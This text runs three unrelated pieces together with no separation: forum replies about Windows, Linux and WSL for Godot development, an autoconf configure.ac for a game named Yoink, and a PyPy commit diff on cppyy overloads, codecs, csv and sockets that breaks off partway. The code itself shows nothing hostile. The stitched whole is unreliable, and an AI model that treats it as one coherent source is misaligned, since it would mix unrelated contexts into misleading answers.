Where are they sharing these polls?
There’s a post in the news/blog section of the main website, but I think they also post links to social media and probably this forum too.
okey thanks :smiley:
I use Windows and Linux, depending on the specific task. Both systems have their advantages and disadvantages, so using them both at once always worked best for me.
My WSL experiences were rather bad. I used a full Hyper-V Linux VM for a while before getting a real secondary Linux PC at some point.
Using Linux as full development environment for (Godot) games works pretty well nowadays, but you most likely still want to develop for Windows (90%+ market share), which includes testing your games on an actual Windows machine. C# with NativeAOT enabled also doesn’t support cross-compilation, so if you are using that you will need Windows anyways.
Another sidenote: there are quite a few OS specific differences in Godot and .NET, so testing any somewhat advanced game on all target platforms is absolutely mandatory.
#
# Yoink
# Process this file with autoconf to produce a configure script.
#

AC_PREREQ(2.61)
AC_INIT([Yoink],[0.1],[[email protected]],[yoink])
AC_CANONICAL_TARGET
AC_CONFIG_SRCDIR([src/version.c])
AC_CONFIG_MACRO_DIR([m4])
AM_INIT_AUTOMAKE([dist-bzip2 no-dist-gzip])

#
# Determine the target platform.
#

case "${host}" in
    *mingw32*)       WIN32=yes ;;
    *-apple-darwin*) MACOSX=yes ;;
    *netbsd*)        NETBSD=yes ;;
esac

AM_CONDITIONAL([WIN32], [test x$WIN32 = xyes])
AM_CONDITIONAL([MACOSX], [test x$MACOSX = xyes])
AM_CONDITIONAL([NETBSD], [test x$NETBSD = xyes])

#
# Checks for configuration arguments.
#

AC_ARG_ENABLE([debug],
    [AS_HELP_STRING([--enable-debug], [include debugging symbols and code paths])],
    [debug=$enableval], [debug=no])

AC_ARG_ENABLE([double-precision],
    [AS_HELP_STRING([--enable-double-precision], [use doubles instead of floats])],
    [double_precision=$enableval], [double_precision=no])

AC_ARG_ENABLE([profile],
    [AS_HELP_STRING([--enable-profile], [make a binary with code profiling instructions])],
    [profile=$enableval], [profile=no])

AC_ARG_ENABLE([extra-warnings],
    [AS_HELP_STRING([--enable-extra-warnings], [make the gcc compiler give more warnings])],
    [extra_warnings=$enableval], [extra_warnings=no])

AC_ARG_ENABLE([link-sh],
    [AS_HELP_STRING([--enable-link-sh], [give the executable fewer direct dependencies])],
    [link_sh=$enableval], [link_sh=no])

AC_ARG_ENABLE([clock_gettime],
    [AS_HELP_STRING([--enable-clock_gettime], [use clock_gettime() instead of SDL_GetTicks()])],
    [clock_gettime=$enableval], [clock_gettime=no])

AC_ARG_ENABLE([threads],
    [AS_HELP_STRING([--enable-threads], [use threads for concurrency where appropriate])],
    [threads=$enableval], [threads=no])

AC_ARG_WITH([gui-toolkit],
    [AS_HELP_STRING([--with-gui-toolkit=ARG], [possible values: none (default), gtk, qt4])],
    [gui_toolkit=$withval], [gui_toolkit=none])

if test x$debug = xyes
then
    CFLAGS="$CFLAGS -DDEBUG -ggdb -O0 -Wall -Wno-uninitialized"
    CXXFLAGS="$CXXFLAGS -DDEBUG -ggdb -O0 -Wall -Wno-uninitialized"
else
    CFLAGS="$CFLAGS -DNDEBUG"
    CXXFLAGS="$CXXFLAGS -DNDEBUG"
fi

if test x$double_precision = xyes
then
    AC_DEFINE([USE_DOUBLE_PRECISION], 1,
        [Define to 1 if you want to use doubles instead of floats.])
fi

if test x$profile = xyes
then
    CFLAGS="$CFLAGS -pg"
    CXXFLAGS="$CXXFLAGS -pg"
    AC_DEFINE([PROFILING_ENABLED], 1,
        [Define to 1 if profiling is built in.])
fi

if test x$extra_warnings = xyes
then
    CFLAGS="$CFLAGS -Wextra -Wno-unused-parameter"
    CXXFLAGS="$CXXFLAGS -Wextra -Wno-unused-parameter"
fi

AM_CONDITIONAL([LINK_SH], [test x$link_sh = xyes])

if test x$threads = xyes
then
    AC_DEFINE([USE_THREADS], 1,
        [Define to 1 if you want to use threads when applicable.])
fi

if test x$gui_toolkit = xgtk
then
    AC_DEFINE([USE_GTK], 1, [Define to 1 if you want to use GTK+ modal dialogs.])
elif test x$gui_toolkit = xqt4
then
    AC_DEFINE([USE_QT4], 1, [Define to 1 if you want to use QT4 modal dialogs.])
fi

if test "x$prefix" = xNONE
then
    prefix="$ac_default_prefix"
fi

if test x$WIN32 = xyes
then
    DATADIR="data"
else
    eval eval DATADIR="${datadir}/$PACKAGE"
fi
AC_SUBST([DATADIR])
AC_DEFINE_UNQUOTED([YOINK_DATADIR], ["$DATADIR"],
    [Define to the path of the game asset directory.])

#### AC_MSG_NOTICE([Checks for programs.]) ####

AC_PROG_CXX
AC_PROG_CC
AC_PROG_INSTALL
AC_PROG_RANLIB
AM_PROG_CC_C_O
PKG_PROG_PKG_CONFIG

AC_PATH_PROGS([CUT], [cut])
if test x$CUT = x
then
    AC_MSG_ERROR([The cut program is required.])
fi

AC_PATH_PROGS([FIND], [find])
if test x$FIND = x
then
    AC_MSG_ERROR([The find program is required.])
fi

if test x$WIN32 = xyes
then
    AC_PATH_PROGS([WINDRES], [windres $host_alias-windres $host_os-windres])
    if test x$WINDRES = x
    then
        AC_MSG_ERROR([The windres program is required.])
    fi
    AC_PATH_PROGS([ZIP], [zip])
    if test x$ZIP = x
    then
        AC_MSG_WARN([The zip program is needed to build a portable package.])
    fi
    AC_PATH_PROGS([MAKENSIS], [makensis])
    if test x$MAKENSIS = x
    then
        AC_MSG_WARN([The makensis program is needed to build an installer.])
    fi
    AC_PATH_PROGS([GROFF], [groff])
    if test x$GROFF = x
    then
        AC_MSG_WARN([The groff program is needed to create the manual page.])
    fi
elif test x$NETBSD = xyes
then
    AC_PATH_PROGS([PKGLINT], [pkglint])
fi
AM_CONDITIONAL([HAVE_MAKENSIS], [test x$MAKENSIS != x])

#### AC_MSG_NOTICE([Checks for libraries.]) ####

##### SDL #####
website="http://www.libsdl.org/"
PKG_CHECK_MODULES([SDL], [sdl],
    [LIBS="$LIBS $SDL_LIBS"
     CFLAGS="$CFLAGS $SDL_CFLAGS"
     CXXFLAGS="$CXXFLAGS $SDL_CFLAGS"],
    [missing=yes
     AC_MSG_WARN([Missing SDL ($website)])])

##### opengl, glu #####
website="http://www.mesa3d.org/"
PKG_CHECK_MODULES([OPENGL], [gl glu],
    [LIBS="$LIBS $OPENGL_LIBS"
     CFLAGS="$CFLAGS $OPENGL_CFLAGS"
     CXXFLAGS="$CXXFLAGS $OPENGL_CFLAGS"],
    [missing=yes
     AC_MSG_WARN([Missing OpenGL ($website)])])

##### libpng #####
website="http://www.libpng.org/pub/png/libpng.html"
PKG_CHECK_MODULES([PNG], [libpng],
    [LIBS="$LIBS $PNG_LIBS"
     CFLAGS="$CFLAGS $PNG_CFLAGS"
     CXXFLAGS="$CXXFLAGS $PNG_CFLAGS"],
    [missing=yes
     AC_MSG_WARN([Missing libpng ($website)])])

##### openal #####
website="http://connect.creativelabs.com/openal/"
PKG_CHECK_MODULES([OPENAL], [openal],
    [LIBS="$LIBS $OPENAL_LIBS"
     CFLAGS="$CFLAGS $OPENAL_CFLAGS"
     CXXFLAGS="$CXXFLAGS $OPENAL_CFLAGS"],
    [missing=yes
     AC_MSG_WARN([Missing OpenAL ($website)])])

##### libvorbis #####
website="http://www.xiph.org/downloads/"
PKG_CHECK_MODULES([VORBIS], [vorbisfile],
    [LIBS="$LIBS $VORBIS_LIBS"
     CFLAGS="$CFLAGS $VORBIS_CFLAGS"
     CXXFLAGS="$CXXFLAGS $VORBIS_CFLAGS"],
    [missing=yes
     AC_MSG_WARN([Missing libvorbisfile ($website)])])

##### liblua #####
website="http://www.lua.org/"
PKG_CHECK_MODULES([LUA], [lua],
    [LIBS="$LIBS $LUA_LIBS"
     CFLAGS="$CFLAGS $LUA_CFLAGS"
     CXXFLAGS="$CXXFLAGS $LUA_CFLAGS"],
    [missing=yes
     AC_MSG_WARN([Missing liblua ($website)])])

##### GTK+ 2.0 #####
if test x$gui_toolkit = xgtk
then
    website="http://www.gtk.org/"
    PKG_CHECK_MODULES([GTK], [gtk+-2.0],
        [LIBS="$LIBS $GTK_LIBS"
         CFLAGS="$CFLAGS $GTK_CFLAGS"
         CXXFLAGS="$CXXFLAGS $GTK_CFLAGS"],
        [missing=yes
         AC_MSG_WARN([Missing GTK+-2.0 ($website)])])
fi

##### QT4 #####
if test x$gui_toolkit = xqt4
then
    website="http://qt.nokia.com/"
    PKG_CHECK_MODULES([QT4], [QtGui],
        [LIBS="$LIBS $QT4_LIBS"
         CFLAGS="$CFLAGS $QT4_CFLAGS"
         CXXFLAGS="$CXXFLAGS $QT4_CFLAGS"],
        [missing=yes
         AC_MSG_WARN([Missing QT4 ($website)])])
fi

if test x$missing = xyes
then
    AC_MSG_ERROR([You are missing some required libraries.])
fi

#### AC_MSG_NOTICE([Checks for header files.]) ####

AC_HEADER_STDBOOL
AC_HEADER_STDC
AC_CHECK_HEADERS([stddef.h stdint.h stdlib.h string.h unistd.h])
BOOST_SMART_PTR
BOOST_STRING_ALGO
BOOST_BIND
BOOST_FUNCTION

#### AC_MSG_NOTICE([Checks for types.]) ####

AC_TYPE_UINT8_T
AC_TYPE_UINT16_T
AC_TYPE_UINT32_T
AC_TYPE_SIZE_T
AC_TYPE_SSIZE_T

#### AC_MSG_NOTICE([Checks for compiler characteristics.]) ####

AC_C_STRINGIZE
AC_C_INLINE

#### AC_MSG_NOTICE([Checks for library functions.]) ####

AC_FUNC_ERROR_AT_LINE
AC_FUNC_STRTOD
AC_CHECK_FUNCS([nanosleep strchr strcspn strrchr strstr])

if test x$clock_gettime = xyes
then
    AC_SEARCH_LIBS([clock_gettime], [rt],
        [clock_gettime=yes], [clock_gettime=no])
    if test x$clock_gettime = xyes
    then
        AC_DEFINE([HAVE_CLOCK_GETTIME], 1,
            [Define to 1 if you have the 'clock_gettime' function.])
    else
        AC_MSG_WARN([Falling back to SDL_GetTicks().])
    fi
fi

#
# Find the game resources to install.
#

DATA_FILES=$(echo $(cd data && find . -name "*.lua" \
                                   -o -name "*.ogg" \
                                   -o -name "*.png" \
                                   -o -name "yoinkrc"))
AC_SUBST([DATA_FILES])

#
# Split the version number into components.
# These definitions are used in the win32 resource file, src/yoink.rc.
#

VERSION_MAJOR=$(echo $VERSION | cut -d. -f1)
VERSION_MINOR=$(echo $VERSION | cut -d. -f2)
VERSION_REVISION=$(echo $VERSION | cut -d. -f3)
AC_DEFINE_UNQUOTED([VERSION_MAJOR], [${VERSION_MAJOR:-0}],
    [Define to major version number component.])
AC_DEFINE_UNQUOTED([VERSION_MINOR], [${VERSION_MINOR:-0}],
    [Define to minor version number component.])
AC_DEFINE_UNQUOTED([VERSION_REVISION], [${VERSION_REVISION:-0}],
    [Define to revision version number component.])
PVERSION="${VERSION_MAJOR:-0}.${VERSION_MINOR:-0}.${VERSION_REVISION:-0}.0"
AC_SUBST([PVERSION])

if githead=$(git log -n1 --date=short --pretty=format:"%h (%ad)")
then
    AC_DEFINE_UNQUOTED([YOINK_GITHEAD], ["$githead"],
        [Define to the git commit currently checked out.])
fi

#
# Create the build files.
#

AC_CONFIG_FILES([Makefile
                 data/Makefile
                 doc/yoink.6
                 src/Makefile])
AC_CONFIG_HEADERS([src/config.h])
AC_OUTPUT

#
# Print a friendly little message.
#

echo ""
echo "  Configuration complete!  :-)"
echo ""
echo "      Host: $target"
echo "    Prefix: $prefix"
echo "      Data: $DATADIR"
echo ""
echo "       CXX: $CXX"
echo "  CXXFLAGS: $(echo $CXXFLAGS)"
echo "      LIBS: $(echo $LIBS)"
echo ""
echo "  To finish the installation, execute:"
echo "      make"
echo "      make install"
echo ""
wlav committed 384e11f Merge
o) tests for array overloads
o) tests for global function overloads on lazy lookup
o) code that collects all global overloads lazily
o) merge default into branch
• Parent commits 2cbe44d, 385b313
• Branches reflex-support
Files changed (31)
File pypy/doc/config/objspace.usemodules._csv.txt
+Implementation in RPython for the core of the 'csv' module
+
File pypy/jit/metainterp/optimizeopt/util.py
from pypy.rlib.objectmodel import r_dict, compute_identity_hash
from pypy.rlib.rarithmetic import intmask
from pypy.rlib.unroll import unrolling_iterable
-from pypy.jit.metainterp import resoperation, history
+from pypy.jit.metainterp import resoperation
from pypy.rlib.debug import make_sure_not_resized
from pypy.jit.metainterp.resoperation import rop
+from pypy.rlib.objectmodel import we_are_translated
# ____________________________________________________________
# Misc. utilities
def make_dispatcher_method(Class, name_prefix, op_prefix=None, default=None):
ops = _findall(Class, name_prefix, op_prefix)
def dispatch(self, op, *args):
- opnum = op.getopnum()
- for value, cls, func in ops:
- if opnum == value:
- assert isinstance(op, cls)
+ if we_are_translated():
+ opnum = op.getopnum()
+ for value, cls, func in ops:
+ if opnum == value:
+ assert isinstance(op, cls)
+ return func(self, op, *args)
+ if default:
+ return default(self, op, *args)
+ else:
+ func = getattr(Class, name_prefix + op.getopname().upper(), None)
+ if func is not None:
return func(self, op, *args)
- if default:
- return default(self, op, *args)
+ if default:
+ return default(self, op, *args)
dispatch.func_name = "dispatch_" + name_prefix
return dispatch
File pypy/jit/metainterp/test/test_ajit.py
y -= 1
return res
def g(x, y):
+ set_param(myjitdriver, 'max_unroll_loops', 5)
a1 = f(A(x), y)
a2 = f(A(x), y)
b1 = f(B(x), y)
File pypy/jit/metainterp/test/test_send.py
import py
-from pypy.rlib.jit import JitDriver, promote, elidable
+from pypy.rlib.jit import JitDriver, promote, elidable, set_param
from pypy.jit.codewriter.policy import StopAtXPolicy
from pypy.jit.metainterp.test.support import LLJitMixin, OOJitMixin
def getvalue(self):
return self.y
def f(x, y):
+ set_param(myjitdriver, 'max_unroll_loops', 5)
if x & 1:
w = W1(x)
else:
w2 = W2(20)
def f(x, y):
+ set_param(myjitdriver, 'max_unroll_loops', 5)
if x & 1:
w = w1
else:
File pypy/module/_cffi_backend/ctypefunc.py
for i, cf in enumerate(ctype.fields_list):
if cf.is_bitfield():
raise OperationError(space.w_NotImplementedError,
- space.wrap("cannot pass as argument a struct "
- "with bit fields"))
+ space.wrap("cannot pass as argument or return value "
+ "a struct with bit fields"))
ffi_subtype = self.fb_fill_type(cf.ctype, False)
if elements:
elements[i] = ffi_subtype
File pypy/module/_codecs/interp_codecs.py
"ascii_encode",
"latin_1_encode",
"utf_7_encode",
- "utf_8_encode",
"utf_16_encode",
"utf_16_be_encode",
"utf_16_le_encode",
"ascii_decode",
"latin_1_decode",
"utf_7_decode",
- "utf_8_decode",
"utf_16_decode",
"utf_16_be_decode",
"utf_16_le_decode",
make_encoder_wrapper('mbcs_encode')
make_decoder_wrapper('mbcs_decode')
+# utf-8 functions are not regular, because we have to pass
+# "allow_surrogates=True"
+@unwrap_spec(uni=unicode, errors='str_or_None')
+def utf_8_encode(space, uni, errors="strict"):
+ if errors is None:
+ errors = 'strict'
+ state = space.fromcache(CodecState)
+ result = runicode.unicode_encode_utf_8(
+ uni, len(uni), errors, state.encode_error_handler,
+ allow_surrogates=True)
+ return space.newtuple([space.wrap(result), space.wrap(len(uni))])
+
+@unwrap_spec(string='bufferstr', errors='str_or_None')
+def utf_8_decode(space, string, errors="strict", w_final=False):
+ if errors is None:
+ errors = 'strict'
+ final = space.is_true(w_final)
+ state = space.fromcache(CodecState)
+ result, consumed = runicode.str_decode_utf_8(
+ string, len(string), errors,
+ final, state.decode_error_handler,
+ allow_surrogates=True)
+ return space.newtuple([space.wrap(result), space.wrap(consumed)])
+
@unwrap_spec(data=str, errors='str_or_None', byteorder=int)
def utf_16_ex_decode(space, data, errors='strict', byteorder=0, w_final=False):
if errors is None:
File pypy/module/_csv/interp_reader.py
w_line = space.next(self.w_iter)
except OperationError, e:
if e.match(space, space.w_StopIteration):
- if field_builder is not None:
- raise self.error("newline inside string")
+ if (field_builder is not None and
+ state != START_RECORD and state != EAT_CRNL and
+ (len(field_builder.build()) > 0 or
+ state == IN_QUOTED_FIELD)):
+ if dialect.strict:
+ raise self.error("newline inside string")
+ else:
+ self.save_field(field_builder)
+ break
raise
self.line_num += 1
line = space.str_w(w_line)
File pypy/module/_csv/test/test_reader.py
def test_dubious_quote(self):
self._read_test(['12,12,1",'], [['12', '12', '1"', '']])
+
+ def test_read_eof(self):
+ self._read_test(['a,"'], [['a', '']])
+ self._read_test(['"a'], [['a']])
+ self._read_test(['^'], [['\n']], escapechar='^')
+ self._read_test(['a,"'], 'Error', strict=True)
+ self._read_test(['"a'], 'Error', strict=True)
+ self._read_test(['^'], 'Error', escapechar='^', strict=True)
File pypy/module/_ffi/interp_funcptr.py
w_restype)
addr = rffi.cast(rffi.VOIDP, addr)
func = libffi.Func(name, argtypes, restype, addr, flags)
- return W_FuncPtr(func, argtypes_w, w_restype)
+ try:
+ return W_FuncPtr(func, argtypes_w, w_restype)
+ except OSError:
+ raise OperationError(space.w_SystemError,
+ space.wrap("internal error building the Func object"))
W_FuncPtr.typedef = TypeDef(
File pypy/module/_socket/interp_socket.py
info is a pair (hostaddr, port).
"""
try:
- sock, addr = self.accept(W_RSocket)
+ fd, addr = self.accept()
+ sock = rsocket.make_socket(
+ fd, self.family, self.type, self.proto, W_RSocket)
return space.newtuple([space.wrap(sock),
addr.as_object(sock.fd, space)])
except SocketError, e:
File pypy/module/cppyy/capi/__init__.py
C_METHOD = _C_OPAQUE_PTR
C_INDEX = rffi.LONG
+C_INDEX_ARRAY = rffi.LONGP
WLAVC_INDEX = rffi.LONG
C_METHPTRGETTER = lltype.FuncType([C_OBJECT], rffi.VOIDP)
compilation_info=backend.eci)
def c_method_index_at(cppscope, imethod):
return _c_method_index_at(cppscope.handle, imethod)
-_c_method_index_from_name = rffi.llexternal(
- "cppyy_method_index_from_name",
- [C_SCOPE, rffi.CCHARP], C_INDEX,
+_c_method_indices_from_name = rffi.llexternal(
+ "cppyy_method_indices_from_name",
+ [C_SCOPE, rffi.CCHARP], C_INDEX_ARRAY,
threadsafe=ts_reflect,
compilation_info=backend.eci)
-def c_method_index_from_name(cppscope, name):
- return _c_method_index_from_name(cppscope.handle, name)
+def c_method_indices_from_name(cppscope, name):
+ indices = _c_method_indices_from_name(cppscope.handle, name)
+ if not indices:
+ return []
+ py_indices = []
+ i = 0
+ index = indices[i]
+ while index != -1:
+ i += 1
+ py_indices.append(index)
+ index = indices[i]
+ c_free(rffi.cast(rffi.VOIDP, indices)) # c_free defined below
+ return py_indices
_c_method_name = rffi.llexternal(
"cppyy_method_name",
File pypy/module/cppyy/include/capi.h
/* method/function reflection information --------------------------------- */
int cppyy_num_methods(cppyy_scope_t scope);
cppyy_index_t cppyy_method_index_at(cppyy_scope_t scope, int imeth);
- cppyy_index_t cppyy_method_index_from_name(cppyy_scope_t scope, const char* name);
+ cppyy_index_t* cppyy_method_indices_from_name(cppyy_scope_t scope, const char* name);
char* cppyy_method_name(cppyy_scope_t scope, cppyy_index_t idx);
char* cppyy_method_result_type(cppyy_scope_t scope, cppyy_index_t idx);
File pypy/module/cppyy/interp_cppyy.py
self._make_datamember(datamember_name, i)
def find_overload(self, meth_name):
- # TODO: collect all overloads, not just the non-overloaded version
- meth_idx = capi.c_method_index_from_name(self, meth_name)
- if meth_idx == -1:
+ indices = capi.c_method_indices_from_name(self, meth_name)
+ if not indices:
raise self.missing_attribute_error(meth_name)
- cppfunction = self._make_cppfunction(meth_name, meth_idx)
- overload = W_CPPOverload(self.space, self, [cppfunction])
+ cppfunctions = []
+ for meth_idx in indices:
+ f = self._make_cppfunction(meth_name, meth_idx)
+ cppfunctions.append(f)
+ overload = W_CPPOverload(self.space, self, cppfunctions)
return overload
def find_datamember(self, dm_name):
File pypy/module/cppyy/src/reflexcwrapper.cxx
return (cppyy_index_t)imeth;
}
-cppyy_index_t cppyy_method_index_from_name(cppyy_scope_t handle, const char* name) {
+cppyy_index_t* cppyy_method_indices_from_name(cppyy_scope_t handle, const char* name) {
+ std::vector<cppyy_index_t> result;
Reflex::Scope s = scope_from_handle(handle);
// the following appears dumb, but the internal storage for Reflex is an
// unsorted std::vector anyway, so there's no gain to be had in using the
Reflex::Member m = s.FunctionMemberAt(imeth);
if (m.Name() == name) {
if (m.IsPublic())
- return (cppyy_index_t)imeth;
- return (cppyy_index_t)-1;
+ result.push_back((cppyy_index_t)imeth);
}
}
- return (cppyy_index_t)-1;
+ if (result.empty())
+ return (cppyy_index_t*)0;
+    cppyy_index_t* llresult = (cppyy_index_t*)malloc(sizeof(cppyy_index_t)*(result.size()+1));
+ for (int i = 0; i < (int)result.size(); ++i) llresult[i] = result[i];
+ llresult[result.size()] = -1;
+ return llresult;
}
char* cppyy_method_name(cppyy_scope_t handle, cppyy_index_t method_index) {
File pypy/module/cppyy/test/overloads.cxx
std::string more_overloads2::call(const dd_ol*, int) { return "dd_olptr"; }
std::string more_overloads2::call(const dd_ol&, int) { return "dd_olref"; }
+
+
+double calc_mean(long n, const float* a) { return calc_mean<float>(n, a); }
+double calc_mean(long n, const double* a) { return calc_mean<double>(n, a); }
+double calc_mean(long n, const int* a) { return calc_mean<int>(n, a); }
+double calc_mean(long n, const short* a) { return calc_mean<short>(n, a); }
+double calc_mean(long n, const long* a) { return calc_mean<long>(n, a); }
File pypy/module/cppyy/test/overloads.h
class a_overload {
public:
- a_overload();
- int i1, i2;
+ a_overload();
+ int i1, i2;
};
namespace ns_a_overload {
- class a_overload {
- public:
- a_overload();
- int i1, i2;
- };
+ class a_overload {
+ public:
+ a_overload();
+ int i1, i2;
+ };
- class b_overload {
- public:
- int f(const std::vector<int>* v);
- };
+ class b_overload {
+ public:
+ int f(const std::vector<int>* v);
+ };
}
namespace ns_b_overload {
- class a_overload {
- public:
- a_overload();
- int i1, i2;
- };
+ class a_overload {
+ public:
+ a_overload();
+ int i1, i2;
+ };
}
class b_overload {
public:
- b_overload();
- int i1, i2;
+ b_overload();
+ int i1, i2;
};
class c_overload {
public:
- c_overload();
- int get_int(a_overload* a);
- int get_int(ns_a_overload::a_overload* a);
- int get_int(ns_b_overload::a_overload* a);
- int get_int(short* p);
- int get_int(b_overload* b);
- int get_int(int* p);
+ c_overload();
+ int get_int(a_overload* a);
+ int get_int(ns_a_overload::a_overload* a);
+ int get_int(ns_b_overload::a_overload* a);
+ int get_int(short* p);
+ int get_int(b_overload* b);
+ int get_int(int* p);
};
class d_overload {
public:
- d_overload();
+ d_overload();
// int get_int(void* p) { return *(int*)p; }
- int get_int(int* p);
- int get_int(b_overload* b);
- int get_int(short* p);
- int get_int(ns_b_overload::a_overload* a);
- int get_int(ns_a_overload::a_overload* a);
- int get_int(a_overload* a);
+ int get_int(int* p);
+ int get_int(b_overload* b);
+ int get_int(short* p);
+ int get_int(ns_b_overload::a_overload* a);
+ int get_int(ns_a_overload::a_overload* a);
+ int get_int(a_overload* a);
};
class more_overloads {
public:
- more_overloads();
- std::string call(const aa_ol&);
- std::string call(const bb_ol&, void* n=0);
- std::string call(const cc_ol&);
- std::string call(const dd_ol&);
+ more_overloads();
+ std::string call(const aa_ol&);
+ std::string call(const bb_ol&, void* n=0);
+ std::string call(const cc_ol&);
+ std::string call(const dd_ol&);
- std::string call_unknown(const dd_ol&);
+ std::string call_unknown(const dd_ol&);
- std::string call(double);
- std::string call(int);
- std::string call1(int);
- std::string call1(double);
+ std::string call(double);
+ std::string call(int);
+ std::string call1(int);
+ std::string call1(double);
};
class more_overloads2 {
public:
- more_overloads2();
- std::string call(const bb_ol&);
- std::string call(const bb_ol*);
+ more_overloads2();
+ std::string call(const bb_ol&);
+ std::string call(const bb_ol*);
- std::string call(const dd_ol*, int);
- std::string call(const dd_ol&, int);
+ std::string call(const dd_ol*, int);
+ std::string call(const dd_ol&, int);
};
+
+template<typename T>
+double calc_mean(long n, const T* a) {
+ double sum = 0., sumw = 0.;
+ const T* end = a+n;
+ while (a != end) {
+ sum += *a++;
+ sumw += 1;
+ }
+
+ return sum/sumw;
+}
+
+double calc_mean(long n, const float* a);
+double calc_mean(long n, const double* a);
+double calc_mean(long n, const int* a);
+double calc_mean(long n, const short* a);
+double calc_mean(long n, const long* a);
File pypy/module/cppyy/test/overloads.xml
<class name="more_overloads" />
<class name="more_overloads2" />
+ <function name="calc_mean" />
+
</lcgdict>
File pypy/module/cppyy/test/overloads_LinkDef.h
#pragma link C++ class more_overloads;
#pragma link C++ class more_overloads2;
+#pragma link C++ function calc_mean;
+
#endif
File pypy/module/cppyy/test/test_overloads.py
currpath = py.path.local(__file__).dirpath()
test_dct = str(currpath.join("overloadsDict.so"))
-space = gettestobjspace(usemodules=['cppyy'])
+space = gettestobjspace(usemodules=['cppyy', 'array'])
def setup_module(mod):
if sys.platform == 'win32':
# assert more_overloads().call(1.) == "double"
assert more_overloads().call1(1) == "int"
assert more_overloads().call1(1.) == "double"
+
+ def test07_mean_overloads(self):
+ """Adapted test for array overloading"""
+
+ import cppyy, array
+ cmean = cppyy.gbl.calc_mean
+
+ numbers = [8, 2, 4, 2, 4, 2, 4, 4, 1, 5, 6, 3, 7]
+ mean, median = 4.0, 4.0
+
+ for l in ['f', 'd', 'i', 'h', 'l']:
+ a = array.array(l, numbers)
+            assert round(cmean(len(a), a) - mean, 8) == 0
File pypy/objspace/std/dictmultiobject.py
# Iteration
-class W_DictMultiIterKeysObject(W_Object):
+class W_BaseDictMultiIterObject(W_Object):
from pypy.objspace.std.dicttype import dictiter_typedef as typedef
_immutable_fields_ = ["iteratorimplementation"]
w_self.space = space
w_self.iteratorimplementation = iteratorimplementation
+class W_DictMultiIterKeysObject(W_BaseDictMultiIterObject):
+ pass
+
+class W_DictMultiIterValuesObject(W_BaseDictMultiIterObject):
+ pass
+
+class W_DictMultiIterItemsObject(W_BaseDictMultiIterObject):
+ pass
+
registerimplementation(W_DictMultiIterKeysObject)
-
-class W_DictMultiIterValuesObject(W_Object):
- from pypy.objspace.std.dicttype import dictiter_typedef as typedef
-
- _immutable_fields_ = ["iteratorimplementation"]
-
- ignore_for_isinstance_cache = True
-
- def __init__(w_self, space, iteratorimplementation):
- w_self.space = space
- w_self.iteratorimplementation = iteratorimplementation
-
registerimplementation(W_DictMultiIterValuesObject)
-
-class W_DictMultiIterItemsObject(W_Object):
- from pypy.objspace.std.dicttype import dictiter_typedef as typedef
-
- _immutable_fields_ = ["iteratorimplementation"]
-
- ignore_for_isinstance_cache = True
-
- def __init__(w_self, space, iteratorimplementation):
- w_self.space = space
- w_self.iteratorimplementation = iteratorimplementation
-
registerimplementation(W_DictMultiIterItemsObject)
def iter__DictMultiIterKeysObject(space, w_dictiter):
File pypy/objspace/std/ropeunicodeobject.py
if result is not None:
return W_RopeObject(result)
elif encoding == "utf-8":
- result = rope.unicode_encode_utf8(node)
+ result = rope.unicode_encode_utf8(node, allow_surrogates=True)
if result is not None:
return W_RopeObject(result)
return encode_object(space, w_unistr, encoding, errors)
File pypy/objspace/std/unicodeobject.py
from pypy.rlib.objectmodel import compute_hash, specialize
from pypy.rlib.objectmodel import compute_unique_id
from pypy.rlib.rstring import UnicodeBuilder
-from pypy.rlib.runicode import unicode_encode_unicode_escape
+from pypy.rlib.runicode import make_unicode_escape_function
from pypy.module.unicodedata import unicodedb
from pypy.tool.sourcetools import func_with_new_name
from pypy.rlib import jit
space.wrap("character mapping must return integer, None or unicode"))
return W_UnicodeObject(u''.join(result))
+_repr_function, _ = make_unicode_escape_function(
+ pass_printable=False, unicode_output=False, quotes=True, prefix='u')
+
def repr__Unicode(space, w_unicode):
chars = w_unicode._value
size = len(chars)
- s = unicode_encode_unicode_escape(chars, size, "strict", quotes=True)
+ s = _repr_function(chars, size, "strict")
return space.wrap(s)
def mod__Unicode_ANY(space, w_format, w_values):
File pypy/objspace/std/unicodetype.py
if encoding == 'ascii':
u = space.unicode_w(w_object)
eh = encode_error_handler(space)
- return space.wrap(unicode_encode_ascii(u, len(u), None,
- errorhandler=eh))
+ return space.wrap(unicode_encode_ascii(
+ u, len(u), None, errorhandler=eh))
if encoding == 'utf-8':
u = space.unicode_w(w_object)
eh = encode_error_handler(space)
- return space.wrap(unicode_encode_utf_8(u, len(u), None,
- errorhandler=eh))
+ return space.wrap(unicode_encode_utf_8(
+ u, len(u), None, errorhandler=eh,
+ allow_surrogates=True))
from pypy.module._codecs.interp_codecs import lookup_codec
w_encoder = space.getitem(lookup_codec(space, encoding), space.wrap(0))
if errors is None:
# XXX error handling
s = space.bufferstr_w(w_obj)
eh = decode_error_handler(space)
- return space.wrap(str_decode_ascii(s, len(s), None,
- final=True,
- errorhandler=eh)[0])
+ return space.wrap(str_decode_ascii(
+ s, len(s), None, final=True, errorhandler=eh)[0])
if encoding == 'utf-8':
s = space.bufferstr_w(w_obj)
eh = decode_error_handler(space)
- return space.wrap(str_decode_utf_8(s, len(s), None,
- final=True,
- errorhandler=eh)[0])
+ return space.wrap(str_decode_utf_8(
+ s, len(s), None, final=True, errorhandler=eh,
+ allow_surrogates=True)[0])
w_codecs = space.getbuiltinmodule("_codecs")
w_decode = space.getattr(w_codecs, space.wrap("decode"))
if errors is None:
File pypy/rlib/rope.py
if rope.is_bytestring():
return rope
-def unicode_encode_utf8(rope):
+def unicode_encode_utf8(rope, allow_surrogates=False):
from pypy.rlib.runicode import unicode_encode_utf_8
if rope.is_ascii():
return rope
unicode_encode_utf8(rope.right))
elif isinstance(rope, LiteralUnicodeNode):
return LiteralStringNode(
- unicode_encode_utf_8(rope.u, len(rope.u), "strict"))
+ unicode_encode_utf_8(rope.u, len(rope.u), "strict",
+ allow_surrogates=allow_surrogates))
elif isinstance(rope, LiteralStringNode):
return LiteralStringNode(_str_encode_utf_8(rope.s))
File pypy/rlib/rsocket.py
"""
_mixin_ = True # for interp_socket.py
fd = _c.INVALID_SOCKET
- def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0):
+ def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0,
+ fd=_c.INVALID_SOCKET):
"""Create a new socket."""
- fd = _c.socket(family, type, proto)
+ if _c.invalid_socket(fd):
+ fd = _c.socket(family, type, proto)
if _c.invalid_socket(fd):
raise self.error_handler()
# PLAT RISCOS
addrlen_p[0] = rffi.cast(_c.socklen_t, maxlen)
